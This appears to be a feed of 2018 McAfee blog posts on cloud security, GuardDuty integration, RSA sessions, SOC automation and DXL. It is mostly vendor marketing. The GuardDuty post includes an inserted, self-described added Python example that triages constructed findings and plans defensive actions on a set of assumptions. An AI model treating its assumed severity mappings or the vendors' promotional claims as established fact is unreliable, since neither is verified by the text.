The cloud is a nuanced area in technology and securely managing it requires specific knowledge – which is why it feels the effects of the skills shortage two-fold. In fact, according to our recent report Navigating a Cloudy Sky: Practical Guidance and the State of Cloud Security, more than 25% of organizations using infrastructure as a service (IaaS) or software as a service (SaaS) have experienced data theft from their hosted infrastructure or applications. Furthermore, one in five were infiltrated by advanced attackers targeting their public cloud infrastructures. All too often these attacks originate from user misconfigurations, a lack of updates, or a selection of the wrong technology.

Put two and two together, and these breaches make one thing apparent: organizations are not only lacking cybersecurity talent, but sufficient cloud security talent, which ultimately puts them more at risk of an attack. Mind you, this talent gap is also delaying enterprise migration to cloud computing.

Security skills vs. cloud security skills

However, it’s important to note that the list of skills required for successful cloud security isn’t precisely a carbon copy of what many expect from a cybersecurity professional. Plugging one gap will not always fill the other.

Of course, general security skills, such as incident response, data analysis, and threat hunting, are still crucial when it comes to securing the cloud. But they are not sufficient on their own. Cloud security professionals and architects also need to come to the table with a deep knowledge of identity and access management (IAM), deployment automation, and cloud regulatory compliance.

But just like cloud security is a shared responsibility between vendor and customer, so is the cloud security skills shortage between the cybersecurity industry and future professionals. While we must hope that professionals pursue the right training, the cybersecurity industry must also do its part in educating both future candidates and current employees on the ins and outs of modern-day cloud security. And this doesn’t just mean teaching the correct configurations for AWS either, but rather helping these professionals learn about the tenets of cloud adoption, including costs, monitoring, potential barriers, and more.

To plug your cloud security skills gap, the answer is not to hire quickly, but rather hire and train strategically. Evaluate what security issues your cloud infrastructure has faced and map those issues back to the applicable skills needed to address them. From there, securing IaaS and SaaS solutions shouldn’t seem so cloudy to your IT team.

To learn more about what McAfee is doing to help address the cybersecurity skills shortage, be sure to follow us at @McAfee and @McAfee_Business.

The post The Ramifications of the Skills Shortage on Cloud Security appeared first on McAfee Blogs.

McAfee Showcases ESM-TYCHON Cyber Scorecard at Security Through Innovation Summit https://securingtomorrow.mcafee.com/other-blogs/mcafee-partners/mcafee-showcases-esm-tychon-cyber-scorecard-at-security-through-innovation-summit/ Tue, 22 May 2018 15:53:14 +0000

On Tuesday, May 22, McAfee will host the 2018 Security Through Innovation Summit at the Willard Intercontinental Hotel in Washington, D.C. The half-day event will showcase a dynamic lineup of private and public sector experts addressing the key issues central to the future of federal cybersecurity and IT.

This year’s showcase features the latest certified McAfee Security Innovation Alliance (SIA) integration combining McAfee Enterprise Security Manager (ESM) 10.3 with TYCHON, an enterprise endpoint management and endpoint detection and response (EDR) technology developed by Tychon LLC (Tychon). This combined solution addresses the U.S. Department of Defense (DoD) Cyber Scorecard mandate, which measures progress on targets set in DoD’s Cybersecurity Discipline Implementation plan released in 2015. The plan identified key tasks related to proper cyber management, such as requiring strong user authentication, removing outdated software and internet-facing web servers that no longer have an operational requirement, and properly aligning networks and information systems.

Of course, all these tasks require resources, and according to the recent McAfee report, Hacking the Skills Shortage, demand for cybersecurity professionals is outpacing the supply of qualified workers. However, nine out of 10 respondents said that cybersecurity technology could help compensate for a skills shortage. The shortage of qualified workers coupled with the vast number of cyber threats facing organizations highlights the need for integrated solutions that achieve more with fewer resources.

In combination with McAfee Policy Auditor, TYCHON provides real-time actionable information needed to populate the complete DoD Cyber Scorecard. The ESM-TYCHON integration enables McAfee customers to visualize the ten threat assessment items presented in the Cyber Scorecard via dynamic dashboards in real-time, including a Summary Dashboard presented by ESM, and a Detail Dashboard powered by TYCHON.

Specifically, the Detail Dashboard presents the status of each of the following:

  • Web Server Public Key Infrastructure (PKI)
  • User Logon
  • Host Based Security System (HBSS) Services
  • STIG Compliance
  • Microsoft Windows Patches
  • Linux/OSX Updates
  • System Compliance

Together, the McAfee-Tychon integration facilitates effective cyber incident response by providing executive summaries (overall scores) of an organization’s assets (endpoints) and reporting asset benchmark results. The Scorecard can filter data by asset, organizational group, and task results.

Such capabilities provide a critical advantage when organizations must maximize their teams’ abilities to effectively detect threats, reduce risks and ensure compliance. This latest McAfee SIA partner integration with Tychon offers customers a certified, integrated solution that allows them to resolve threats faster with fewer resources.

McAfee recently announced 19 new partners to the McAfee SIA program, and seven newly certified, integrated solutions. This partner ecosystem helps accelerate the development of open and interoperable security products, simplify integration with complex customer environments, and provide a truly integrated, connected security ecosystem to maximize the value of existing customer security investments.

Please visit our McAfee SIA page for more information on program partners, certified solutions, and membership details.

Please visit Tychon for more information on the TYCHON technology.

Please visit our Security Through Innovation Summit site for more information on this week’s public sector IT event.

The post McAfee Showcases ESM-TYCHON Cyber Scorecard at Security Through Innovation Summit appeared first on McAfee Blogs.

Enriching Cloud Threat Intelligence and Visibility – Cloud Workload Security and AWS GuardDuty https://securingtomorrow.mcafee.com/business/cloud-security/enriching-cloud-threat-intelligence-and-visibility-cloud-workload-security-and-aws-guardduty/ Fri, 18 May 2018 21:28:22 +0000

This blog was written by Stan Golubchik.

Using cloud-native threat intelligence to enhance workload security

Risk assessment is crucial in today's public cloud. In Amazon Web Services (AWS), native monitoring of ingress and egress network data can shed light on potential network threats and anomalies. GuardDuty, an AWS service, continuously monitors the following data sources from an AWS tenant's account:

  • VPC Flow Logs
  • AWS CloudTrail event logs
  • DNS logs

GuardDuty correlates these log sources with threat intelligence feeds to flag potentially unauthorized and malicious activity within an AWS environment, and to enrich each finding with context. Findings can be viewed in the GuardDuty console or routed through Amazon CloudWatch Events, giving you a running picture of the security status of your AWS environment.

While GuardDuty can act as a standalone service with substantial benefit for security and risk assessment in an AWS environment, converging GuardDuty threat intelligence into a broader cloud workload protection platform can provide extended benefits:

  • Automated detection capabilities
  • A single pane of glass for visibility over AWS, along with Azure and VMware
  • Actionable remediation workflows

By bridging native, API-driven AWS data sources such as GuardDuty with a cloud workload protection platform like McAfee Cloud Workload Security (CWS), AWS tenants can use these data-rich AWS sources within CWS to manage and secure mission-critical workloads with advanced security from a single console.

Discover and protect with Cloud Workload Security

CWS integrates directly with the AWS GuardDuty API, which is the ideal way to visualize anomalous network activity and threat events. GuardDuty findings categorized as low or medium severity within AWS are flagged as medium severity events within the CWS console.

Setting up the connection between GuardDuty and McAfee CWS is straightforward. The prerequisite configuration requirements are as follows:

  • Enable GuardDuty through your AWS management console.

  • The security credentials used for registering your account within CWS should have GuardDuty permissions assigned for read access to GuardDuty’s threat intelligence and network flow data.

Once the initial configuration has been instantiated, GuardDuty data will immediately be pulled by CWS.  Through the CWS management console (McAfee ePolicy Orchestrator, or ePO), you are able to visualize threat information directly from GuardDuty. The GuardDuty events you will see include:

  • Brute force attacks
  • Port scans
  • Tor communications
  • SSH brute force
  • Outbound DDoS
  • Bitcoin mining
  • Unusual DNS requests
  • Unusual traffic volume and direction

IAM-related events are currently not supported. As soon as GuardDuty assigns a severity verdict to a potential threat, you can pivot directly into a response action. Actions that can be taken include:

  • Shutting down the compromised EC2 instance(s) which have been flagged.
  • Tightening network controls through micro-segmentation: altering security group rules (port, protocol, or source/destination IP) to limit and control network connectivity to any EC2 instance.
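The triage flow described above (the GuardDuty data sources and finding categories, the Low/Medium-to-Medium severity mapping, the exclusion of IAM findings, and the pivot to stopping an instance or tightening a security group), as an added example that is not McAfee CWS code. The finding dicts follow the layout of real GuardDuty finding JSON (Type, Severity, Resource.InstanceDetails.InstanceId, Service.Action), but every value is constructed; the severity bands are AWS's documented ones, the High-to-High mapping is an assumption the text does not state, and the response rules are illustrative rather than any vendor's.

```python
"""Triage of AWS GuardDuty findings in the style of a workload-protection
console: bucket severity, keep only EC2 instance findings (IAM findings are
not ingested, as the text notes), and pick a response.

Added example, not McAfee Cloud Workload Security code. Assumptions: the
GuardDuty severity bands are Low < 4.0, Medium 4.0-6.9, High >= 7.0 (AWS
docs); Low/Medium -> Medium follows the text, High -> High is assumed; the
response rules are illustrative.
"""

# Constructed findings in GuardDuty's layout (not captured from any account).
SAMPLE_FINDINGS = [
    {   # inbound SSH password guessing against port 22 of one instance
        "Type": "UnauthorizedAccess:EC2/SSHBruteForce",
        "Severity": 2.0,
        "Resource": {"ResourceType": "Instance",
                     "InstanceDetails": {"InstanceId": "i-0aaa1111bbbb2222c"}},
        "Service": {"Action": {
            "ActionType": "NETWORK_CONNECTION",
            "NetworkConnectionAction": {
                "ConnectionDirection": "INBOUND",
                "Protocol": "TCP",
                "LocalPortDetails": {"Port": 22},
                "RemoteIpDetails": {"IpAddressV4": "203.0.113.5"}}}},
    },
    {   # instance resolving a mining pool's domain: high severity
        "Type": "CryptoCurrency:EC2/BitcoinTool.B!DNS",
        "Severity": 8.0,
        "Resource": {"ResourceType": "Instance",
                     "InstanceDetails": {"InstanceId": "i-0ccc3333dddd4444e"}},
        "Service": {"Action": {"ActionType": "DNS_REQUEST",
                               "DnsRequestAction": {"Domain": "pool.example"}}},
    },
    {   # IAM finding: not an EC2 instance, so the console skips it
        "Type": "UnauthorizedAccess:IAMUser/ConsoleLoginSuccess.B",
        "Severity": 5.0,
        "Resource": {"ResourceType": "AccessKey"},
        "Service": {"Action": {"ActionType": "AWS_API_CALL"}},
    },
    {   # instance scanning other hosts: outbound, medium severity
        "Type": "Recon:EC2/Portscan",
        "Severity": 5.0,
        "Resource": {"ResourceType": "Instance",
                     "InstanceDetails": {"InstanceId": "i-0eee5555ffff6666a"}},
        "Service": {"Action": {
            "ActionType": "NETWORK_CONNECTION",
            "NetworkConnectionAction": {"ConnectionDirection": "OUTBOUND",
                                        "Protocol": "TCP"}}},
    },
]


def parse_finding_type(finding_type):
    """Split 'ThreatPurpose:Resource/Family.Mechanism!Artifact' into parts."""
    purpose, rest = finding_type.split(":", 1)
    resource, family = rest.split("/", 1)
    family = family.split("!", 1)[0].split(".", 1)[0]
    return {"purpose": purpose, "resource": resource, "family": family}


def guardduty_band(severity):
    """AWS severity bands (assumed from AWS docs): LOW, MEDIUM, HIGH."""
    if severity >= 7.0:
        return "HIGH"
    if severity >= 4.0:
        return "MEDIUM"
    return "LOW"


def cws_severity(severity):
    """Console severity: GuardDuty Low and Medium both surface as Medium
    (per the text); High stays High (assumption)."""
    return "HIGH" if guardduty_band(severity) == "HIGH" else "MEDIUM"


def plan_response(finding):
    """Return the pivot action for one finding."""
    parsed = parse_finding_type(finding["Type"])
    plan = {"type": finding["Type"],
            "cws_severity": cws_severity(finding["Severity"])}
    resource = finding.get("Resource", {})
    if parsed["resource"] != "EC2" or resource.get("ResourceType") != "Instance":
        plan["action"] = "unsupported"    # IAM and other non-instance findings
        return plan
    plan["instance_id"] = resource["InstanceDetails"]["InstanceId"]
    if plan["cws_severity"] == "HIGH":
        plan["action"] = "stop_instance"  # take the compromised host offline
        return plan
    net = finding["Service"]["Action"].get("NetworkConnectionAction", {})
    if net.get("ConnectionDirection") == "INBOUND":
        # Security groups cannot deny traffic, so the fix is to revoke the
        # broad ingress rule that let the remote host reach this port. The
        # rule named here (assumed to be open to 0.0.0.0/0) uses the same
        # keys as boto3's ec2.revoke_security_group_ingress.
        port = net["LocalPortDetails"]["Port"]
        plan["action"] = "revoke_ingress"
        plan["sg_change"] = {"IpProtocol": net["Protocol"].lower(),
                             "FromPort": port, "ToPort": port,
                             "CidrIp": "0.0.0.0/0"}
        plan["observed_remote"] = net["RemoteIpDetails"]["IpAddressV4"]
        return plan
    plan["action"] = "investigate"        # outbound/other: analyst review
    return plan


def triage(findings):
    """Triage a batch; returns one plan per finding, in input order."""
    return [plan_response(f) for f in findings]


if __name__ == "__main__":
    for p in triage(SAMPLE_FINDINGS):
        print(p["cws_severity"], p["action"], p["type"])
```

In a live deployment the same plans would be fed from `guardduty.list_findings` / `get_findings` (the read permissions the prerequisites above call for) and executed with `ec2.stop_instances` and `ec2.revoke_security_group_ingress`, which is why the security-group change is expressed with those parameter names; the credentials that read findings should not be the ones that carry the EC2 write permissions.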

For more information on McAfee Cloud Workload Security, please visit the following page for feature and solution documentation: https://www.mcafee.com/us/products/cloud-workload-security.aspx

The post Enriching Cloud Threat Intelligence and Visibility – Cloud Workload Security and AWS GuardDuty appeared first on McAfee Blogs.

McAfee vNSP and AWS Are Winning Combination for Enterprise and Federal Customers https://securingtomorrow.mcafee.com/business/mcafee-vnsp-and-aws-are-winning-combination-for-enterprise-and-federal-customers/ Fri, 20 Apr 2018 15:00:28 +0000

Fun Facts: ECS stood up and managed the first security operations center at the White House. Today, ECS manages the world’s largest McAfee installation—employing just about every solution we make—for the U.S. Army.

ECS is more than a McAfee Platinum Partner: they've built their entire security solution around McAfee products. The company's unique offering to enterprise, military, intelligence, and federal civilian customers combines award-winning managed services powered by McAfee with high-level competencies across the Amazon Web Services (AWS) product suite.

ECS has earned service delivery certifications for every McAfee product, participating regularly in betas and trials of new software with active input into the development of new products. Its AWS bona fides are equally ambitious: ECS is an AWS Premier Consulting Partner, an Audited Managed Service Partner, and one of the world’s largest AWS resellers.

For the past 17 years, ECS (formerly InfoReliance) has built a managed-services offering that focuses on delivering custom solutions for clients in regulated industries such as government and defense, but the company also has a large and growing roster of high-profile enterprise and commercial customers. ECS focuses its security solutions around the threat defense lifecycle, applying not only McAfee products but complementary solutions from McAfee Security Innovation Alliance.

“Our choice to provide a single-vendor security platform and deliver McAfee at scale is one of the things that makes us unique,” remarks Andy Woods, Director of Managed Cybersecurity at ECS. “It means our organization can have a depth of expertise that’s frankly unmatched by anyone else in the industry. We also believe it’s the best way to be technology-heavy and people-light, and to automate as much of the cybersecurity lifecycle as we can.”

The McAfee Virtual Network Security Platform (vNSP) and its tight synergy with AWS is a large focus of ECS’s business. Tim Gonda, ECS security engineer and vNSP expert, explains: “We feel it is important to recognize that as part of the AWS shared responsibility model, it is up to us to ensure the security of our virtual networks. We leverage vNSP as a way to augment the security of native AWS capabilities. We are able to establish more flexible controls for protecting our own workloads, as well as providing custom-tailored solutions to our clients.”

In one example of a customer’s virtual private cloud (VPC) deployment, the ECS team launched a vNSP controller into the VPC, and deployed sensors per subnet. The application service also included the lightweight, host-based traffic redirector. “One of the biggest differentiators of vNSP versus other products is that it allows us to monitor internal VPC traffic, as well as traffic leaving the VPC, in an extremely lightweight framework,” Gonda comments. “In this example, we managed the lateral traffic within the VPC, as well as traffic going out to the internet, while providing custom filters and rules looking for specific threats on the wire.”

The application of vNSP with AWS-driven VPCs is just one example of ECS’s fearless innovation in today’s marketplace. Woods notes, “We’re proud of our internally developed intellectual properties, such as our iRamp billing system. We developed one of the very first DXL-enabled technologies within the partner community. We were also early adopters of integrated security through McAfee ePO, born out of a need to support clients in regulated industries.”

Woods concludes, "Our clients are focused on value management of their cybersecurity spend and how we can help them reduce their risk not only today but into the future. We deliver customized security outcomes for every organization we work with. We're confident in McAfee's ability to scale along with core competencies on the endpoint, whether on-premises or in the cloud. The connected infrastructure is a key differentiator for us as we deliver managed services to customers across all verticals. For us, 'Together is Power' means being able to solve our clients' cybersecurity problems in the most powerful manner possible, through a single platform of connected technologies."

The post McAfee vNSP and AWS Are Winning Combination for Enterprise and Federal Customers appeared first on McAfee Blogs.

Cloud Protection Moves Into a New Phase https://securingtomorrow.mcafee.com/business/cloud-security/cloud-protection-moves-into-a-new-phase/ Mon, 16 Apr 2018 03:50:34 +0000

This blog post was written by Sandy Orlando.

It’s RSA Conference season and a great time to talk about containers and security.

No, not traditional shipping containers.

Containers have become developers’ preferred deployment model for modern cloud applications, helping organizations accelerate innovation and differentiate themselves in the marketplace. This is part of the natural progression of the datacenter, moving from the physical, on-premises servers of old, to virtual servers, and then to the public cloud.

According to a report released today by McAfee, “Navigating a Cloudy Sky,” containers have grown rapidly in popularity over the past few years, with 80 percent of those surveyed using or experimenting with them. However, only 66 percent of organizations have a strategy to apply security to containers, so there is still work to be done.

Realistically, most companies will have a mixed, or “hybrid cloud” solution for some time. A big challenge for customers is to maintain security and visibility as they migrate to the public cloud and adopt new technologies like containers.

As containers gain in popularity, enterprises will need to assess how they gain visibility into their container workloads and how security policies are applied to them, in order to ensure those workloads are secure in the cloud. In the shared security responsibility model laid out by cloud providers, enterprises can leverage the available native controls and the interconnectivity with production workloads and data stores, but they must actively manage the security of those workloads themselves. Gaining visibility, mitigating risk and protecting container workloads helps build a strong foundation for secure container initiatives.

McAfee is helping to fill the security need in this new environment by offering hybrid cloud security solutions to customers. For example, the release of McAfee Cloud Workload Security (CWS) v5.1 – announced today and available Q2 2018 – gives customers a tool that identifies and secures Docker containers, workloads and servers in both private and public cloud environments.

McAfee CWS 5.1 quarantines infected workloads and containers with a single click, thus reducing misconfiguration risk and increasing initial remediation efficiency by nearly 90 percent.

Previously, point solutions were needed to help secure containers. But with multiple technologies to control multiple environments, security management faced unnecessary complexities. McAfee CWS can span multi-cloud environments: private data centers using virtual VMware servers, workloads in AWS, and workloads in Azure, all from a single interface.

McAfee CWS identifies Docker containers within five minutes of their deployment and quickly secures them using micro- and nano-segmentation, with a new interface and workflow. Other new features include discovery of Docker containers using Kubernetes, a popular open source platform used to manage containerized workloads and services, and enhanced threat monitoring and detection with AWS GuardDuty alerts, available directly within the CWS dashboard.

McAfee is the first company to provide a comprehensive cloud security solution that protects both data and workloads across the entire Software as a Service and Infrastructure as a Service spectrum. So, when you’re talking containers, be sure to include McAfee in the conversation.

And don’t forget to stop by the McAfee booth, North Hall, #3801, if you’re attending RSA.

RSA Influencers Identify Cybersecurity’s Top Issues
Published on McAfee Blogs, Sun, 15 Apr 2018 21:00:34 +0000: https://securingtomorrow.mcafee.com/business/rsa-influencers-identify-cybersecuritys-top-issues/
More interest, more news, and more money are swirling through the cybersecurity industry than perhaps ever before. Data breaches make headlines, shape elections, and lead to Congressional hearings. Artificial intelligence tools wow the public and stretch the limits of the imagination.

And the 40,000 RSA Conference attendees pouring into San Francisco are not impressed. Cybersecurity is a profession, they say, not a circus.

We reached out to RSA speakers and attendees and asked what they think is the most relevant recent development in cybersecurity. They gave us a variety of answers, many with the central theme that companies and consumers should not believe the hype. Cybersecurity still is – and perhaps always will be – about seasoned professionals patiently applying good tools in a comprehensive way.

“The problem we’re seeing at trade shows recently is there is very little new,” said John Bambenek, a vice president at ThreatSTOP who lectures on cybersecurity at the University of Illinois. “We’re still trying to solve the same old problems in the same ways with newish looking packaging. What’s being overlooked is actually spending the time developing understanding of attacks, threats, and trends so models can be truly informed before making decisions.”

Caroline Wong, Vice President of Security Strategy at Cobalt, agreed. You can’t just turn the latest tools on and watch them vanquish threats. “There’s a big push in DevSecOps for more and more automation, but it’s critical to remember that when it comes to web applications and APIs, manual pen testing is required to discover vulnerabilities in application business logic. Automated scans often miss the most interesting security vulnerabilities.”


“Assuming that machine learning models and classifiers will work 100% of the time is setting your SOC up to fail,” wrote McAfee CISO Grant Bourzikas in an RSA blog post titled, “What humans do better than machines.” Bourzikas and McAfee Chief Human Resources Officer Chatelle Lynch will host a session at RSA on how innovation can help companies retain top talent. “Recruiting and retaining a diverse talent pool in cybersecurity today is so competitive,” Lynch said of her session. “Employees want to know they are at a company that strives for the latest innovation.” But that is always within the realm of human-machine teaming at McAfee, Bourzikas says. Shiny new tech must be paired with human analysis.

Many cited human decisions about data regulation – the opposite of whiz-bang security tech – as one of the main issues in cybersecurity today.

“The most important development in cybersecurity is Facebook’s reaction to the imminent enforcement of GDPR,” says Kevin L. Jackson, Founder and CEO of GovCloud Network. “The sound of Facebook’s leadership failure is deafening. The legal battles around data privacy and security will drive whatever happens across the entire cybersecurity landscape, including what technology is deployed.”


Kathy Delaney Winger, a Tucson-based lawyer whose areas of practice include cybersecurity, concurred. “Businesses may be surprised to learn that they are obligated to comply with laws such as New York’s cybersecurity regulation and the GDPR – even though they do not fall under the jurisdiction of the enacting entities.”

“Far too many small and mid-size businesses simply underestimate the impact that the EU General Data Protection Regulation will have on them,” said Ben Rothke, principal security consultant for Nettitude.

GDPR preparation doesn’t have to be drudgery. Flora Garcia, a McAfee attorney writing about the regulations, has suggested GDPR can also stand for Great Data Protection Rocks. Data protection could even be a shared global citizenship effort along the lines of environmentalism, she says.

The data-protection revolution may even have us rethinking the nature of identity. “The identity industry is moving away from identity,” said Steve Wilson, vice president and principal analyst of Constellation Research, Inc. “What matters in authentication? Not who someone is, but what they are. You need to know something specific about a counter-party, like their age, or their address, or their credit card number, or their nationality, or some mix of these things. You don’t really need to know their identity. This is a very fundamental shift in thinking, and it’s just the beginning of a major regulatory push around data provenance.”


Grounded data-protection hygiene and cybersecurity discipline that looks past the cool factor are not preventing RSA attendees from looking at the very latest threats. “These days, attackers are increasingly focused on cryptocurrencies – stealing them, mining them via cryptojacking or obtaining them as ransom,” said Nick Bilogorskiy, who drives cybersecurity strategy at Juniper Networks and was previously Chief Malware Expert at Facebook. “As companies do not usually have crypto wallets to steal, attackers turn to ransomware because it provides the best bang for the buck and is the logical choice for attackers to monetize business breaches. I expect ransomware and other cryptocurrency malware attacks to grow in popularity this year.”

But even the most quickly evolving threats are enterprises launched by people, aimed at people, and shut down by people. Raj Samani, McAfee’s Chief Scientist, says ransomware and its many forms can be beaten by people – if they get the right help. “The purpose of pseudo-ransomware is typically destruction, but we have seen evidence of its use as a diversionary tactic, and whilst it may appear as traditional ransomware the attackers are unlikely to provide any decryption capability regardless whether the ransom is paid. Either way, with actual ransomware or the decoy tactic, organizations need guidance to mitigate the risk.” Samani is speaking about pseudo-ransomware during his session on the topic at RSA.

Everything in cybersecurity may seem new, baffling, and roiling with change. But people can apply lessons of the past – such as with airport security changes after 9/11 – to find solutions in the future, said McAfee CEO Chris Young. “Smart security changed air travel from top to bottom. We need to bring a cybersecurity paradigm shift that is more collaborative, clear and accessible,” Young said of his RSA keynote on what cybersecurity can learn from those who keep air travel safe.

The information provided on this GDPR page is our informed interpretation of the EU General Data Protection Regulation, is for information purposes only, and does not constitute legal advice or advice on how to achieve operational privacy and security. It is not incorporated into any contract and does not commit, promise or create any legal obligation to deliver any code, result, material, or functionality. Furthermore, the information provided herein is subject to change without notice, and is provided “AS IS” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. If you require legal advice on the requirements of the General Data Protection Regulation, or any other law, or advice on the extent to which McAfee technologies can assist you to achieve compliance with the Regulation or any other law, you are advised to consult a suitably qualified legal professional. If you require advice on the nature of the technical and organizational measures that are required to deliver operational privacy and security in your organization, you should consult a suitably qualified privacy professional. No liability is accepted to any party for any harms or losses suffered in reliance on the contents of this publication.

A Guide to McAfee at RSA 2018
Published on McAfee Blogs, Fri, 06 Apr 2018 17:00:31 +0000: https://securingtomorrow.mcafee.com/business/guide-mcafee-rsa-2018/
As the RSA Conference convenes more than 40,000 April 16-19 at Moscone Center in San Francisco, cybersecurity has perhaps never been so vital, diverse, and wide-ranging. To help make sense of that, McAfee speakers at RSA will look back at influences that shaped this world, ahead to new innovations and management approaches, and deeply into the worst cyber threats of today.

Keynote: CEO Chris Young looks back at airline security flight

What can we learn from the Underwear Bomber and the rule of 3-1-1? Chief Executive Officer Chris Young delivers his sixth RSA keynote Tuesday, April 17th by applying lessons learned fighting terror in the air. “Smart security changed air travel from top to bottom. We need to bring a cybersecurity paradigm shift that is more collaborative, clear and accessible,” Young said of his keynote. Find out what cybersecurity can learn from those who keep air travel the safest form of transportation, bar none. April 17th, 8:55-9:20 a.m., Moscone West, Level 3.

Sessions: Fighting ransomware and nurturing innovation

Christiaan Beek and Raj Samani of the McAfee Advanced Threat Research team uncover the dark world of pseudo-ransomware, where demands for payment mask the devastation of wiper files, and extortion dances with destruction as the world watches. “The purpose of pseudo-ransomware is typically destruction but we have seen evidence of its use as a diversionary tactic, and whilst it may appear as traditional ransomware the attackers are unlikely to provide any decryption capability regardless whether the ransom is paid. Either way, with actual ransomware or the decoy tactic, organizations need guidance to mitigate the risk,” Samani said of his session. Get the point of view of a ransomware hacker as the walls close in during a major campaign takedown. Reserve your seat now for April 16th, 3:35 p.m. (Session code: SEM-M03).

CISO Grant Bourzikas and Chief Human Resources Officer Chatelle Lynch join forces to explain how innovation can help companies retain top talent. “Recruiting and retaining a diverse talent pool in cybersecurity today is so competitive,” Lynch said of her session. “Employees want to know they are at a company that strives for the latest innovation.” Learn how engaging employees (including games!) can make the most of every staff member. April 17, 1-1:45 p.m. (Session Code: SPO1-T07).

Expo Hall: Look for McAfee and McAfee Skyhigh

McAfee acquired Skyhigh Networks early this year, adding state-of-the-art cloud security to our existing portfolio. Look for both McAfee and Skyhigh at RSA:

  • McAfee Booth #N3801 (North Hall)
  • McAfee Skyhigh Booth #S1301 (South Hall)

Follow the floor decals between our two booths in the Expo Halls.

McAfee Skyhigh bowling at hipster hangout!

In a private event on Tuesday evening, April 17th, McAfee and our partners will host a full buy-out networking event at the cool boutique bowling alley Mission Bowling in San Francisco’s edgy Mission District neighborhood. This is a private event targeted at security professionals who want to network with their peers and strike up conversations on everything cloud-related, sparing no one but staying out of the gutter. The event will have a hosted bar, raffle, gourmet food, and giveaways. Request an Invite for the April 17th evening event and learn more about McAfee Skyhigh’s RSA events.

More information on the RSA conference here.

Is Your SOC Caught in the Slow Lane?
Published on McAfee Blogs, Tue, 27 Mar 2018 04:02:13 +0000: https://securingtomorrow.mcafee.com/business/soc-caught-slow-lane/
This blog was written by Jason Rolleston.

Everybody’s got a device. And the data on that device is moving into the public cloud. Massive amounts of data. In a world of massive amounts of data, who’s the traffic cop? The Security Operation Center (SOC).

But these days the daily flow of data traffic resembles a Formula One race car going full out, and some traffic monitors are a single cop on the beat.

Research shows this analogy is not far off: 25% of security events go unanalyzed. And 39% of cybersecurity organizations manually collect, process, and analyze external intelligence feeds.

Think about this. At the dawn of the Digital Century, more than a third of all companies are approaching cybersecurity manually.

This is not sustainable.

In short, there are simply not enough people to keep up with the security challenges. But it’s not a question of training or hiring more people. The idea is for humans to do less and machines to do more. Automating threat defense has many advantages: speed, the ability to learn, and the ability to collaborate with other solutions. Integration of data, analytics, and machine learning are the foundations of the advanced SOC.

For about a year now McAfee engineers have been developing a new architecture for an existing SIEM tool called McAfee® Enterprise Security Manager version 11 (“McAfee ESM 11”), which can serve as the foundation of a modern SOC.

As cybercriminals get smarter, the need for SOC operations to evolve becomes more important. McAfee ESM 11 can help customers transition their SOC from silos of isolated data and manual investigations to faster operations based on machine learning and behavioral analytics.

What makes ESM 11 different from other SIEM tools is its flexible architecture and scalability.

The open and scalable data bus architecture at the heart of McAfee ESM 11 shares huge volumes of raw, parsed and correlated events to allow threat hunters to easily search recent events, while reliably retaining and storing data for compliance and forensics.

The scalability of McAfee ESM 11 architecture allows for flexible horizontal expansion with high availability, giving organizations the ability to rapidly query billions of events. Additional McAfee ESM appliances or virtual machines can be added at any point to add ingestion, query performance, and redundancy.

ESM 11 also includes the ability to partner. An extensible and distributed design integrates with more than three dozen partners, hundreds of standardized data sources, and industry threat intelligence.

By deploying advanced analytics to quickly elevate key insights and context, analysts and members of a security team tasked with examining cyberthreats can focus their attention on high-value next tasks, like understanding a threat’s impact across the organization and what’s needed to respond.

This human-machine teaming, enabled by McAfee’s new and enhanced security operations solutions like McAfee Investigator, McAfee Behavioral Analytics, and McAfee Advanced Threat Defense, allows organizations to more efficiently collect, enrich and share data, turn security events into actionable insights and act to confidently detect and correct sophisticated threats faster. The strategy was outlined in my last SOC blog.

We’ve been testing these products together at the new McAfee Security Fusion Centers, located in Plano, Texas and Cork, Ireland. These facilities were built last year and are designed to support full visibility and global management of risks, in a simulated environment. The Security Fusion Centers give customers a blueprint for building out their own SOCs.

In short, we are revving up the SOC: critical facts in minutes, not hours. Highly tuned appliances collect, process, and correlate log events spanning multiple years with other data streams, including STIX-based threat intelligence feeds. And billions of events and flows are stored, with quick access to long-term event data for investigating attacks.

Let your security travel as fast as your data. And get your SOC out of the slow lane.

The Need for Cybersecurity Products, and Companies, to Talk to Each Other
Published on McAfee Blogs, Fri, 09 Mar 2018 16:00:08 +0000: https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/need-cybersecurity-products-companies-talk/
This blog post was written by Raja Patel.

There are a lot of cyberthreats out there. And some may take comfort that there are 1,300 cybersecurity software firms battling against them. That might seem like a lot, but in the face of thousands of online dangers, it’s a battle that’s not always won. Most of these cybersecurity organizations are, in fact, taking on the challenge in relative vacuums, each trying to solve the same problems in different ways. This essentially creates separate battlefields, versus operating together in this overwhelming cyber war.

We know there is a need to reduce complexity, especially given the struggle to get enough IT security expertise and headcount, and users complain that it’s difficult to get multiple products working together and to maintain those integrations. In fact, 67% [1] of customer respondents indicate that analytics and operations investments are being impaired because of too many point solutions, instead of using an integrated platform. So it’s important to take a closer look at how cybersecurity firms work, and work together.

This is the challenge that led McAfee to create the “Data Exchange Layer” (DXL) in 2014. The idea is simple: companies collaborate in an information/intelligence exchange. The DXL communication fabric connects and optimizes security actions across multiple vendor products, as well as internally developed and open-source solutions. Enterprises gain secure, near real-time access to new data and instant interactions with other products.

As of today, the DXL ecosystem has more than a dozen participants, including Aruba, Check Point, Cisco, Huawei, Interset, SAS, and Titus. And in the past six months alone 24 companies have begun the process to join, including IBM Security, Juniper, and VMware.

Open DXL

The DXL concept got a big boost in 2016, when McAfee announced it would open the DXL source code to developers (the “Open DXL” initiative). OpenDXL helps developers and enterprises freely leverage DXL, giving the “keys to the kingdom” to 1,500 software developers to date. That’s an additional 1,500 software developers fighting for everyone’s safety.

The OpenDXL.com website is the focal point for the OpenDXL community and allows developers to imagine, discover, build, deploy, or discuss services for the DXL communications fabric. The goal is to empower DXL integrations, provide a catalog of available apps, and nurture new ideas.

The OpenDXL initiative has shown increasing adoption, with 57 community-built integrations on opendxl.com to date. Solutions are aided via a software developer kit (SDK), published to the GitHub source code repository and OpenDXL.com. Through the OpenDXL initiative, integration and orchestration are now extended to open-source and enterprise applications.

Joining with Cisco

DXL continues to evolve with a robust platform to arm for cybersecurity warfare. In late 2017 McAfee and Cisco began a joint integration between DXL and Cisco’s own messaging fabric, pxGrid, creating the industry’s largest threat-protection integration ecosystem (100 partners).

